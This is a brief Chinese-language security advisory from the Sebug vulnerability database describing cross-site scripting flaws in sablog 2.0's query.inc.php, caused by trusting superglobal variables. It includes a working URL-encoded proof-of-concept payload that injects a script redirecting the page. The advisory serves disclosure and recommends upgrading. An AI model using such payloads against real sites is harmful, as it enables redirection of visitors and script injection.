sablog2.0 query.inc.php 跨站漏洞

SSV-ID: 4965
SSV-AppDir: sablog漏洞
信息提交: kiki
发布时间: 2009-04-01

漏洞版本:

sablog 2.0

漏洞描述:

sablog是国内安全研究人员写的一款blog程序。由于过滤不严,存在多个跨站漏洞.
http://www.sablog.net/blog/

./include/query.inc.php
问题出在经常被人忽视的超全局变量上,过于相信超全局变量了
<* 参考
sebug.net
http://sc.mac.gd/appdir/sablog
*>

测试方法:

/include/query.inc.php/%3Cscript%3Etop.location.href%3D%27http%3A%2F%27%2B%27%2Fwww.sebug.net%2Findex.php%27%3B%3C%2Fscript%3E 

Sebug安全建议:

 最新版本
http://www.sablog.net/blog/
@Sebug.net [ 2009-04-01 ]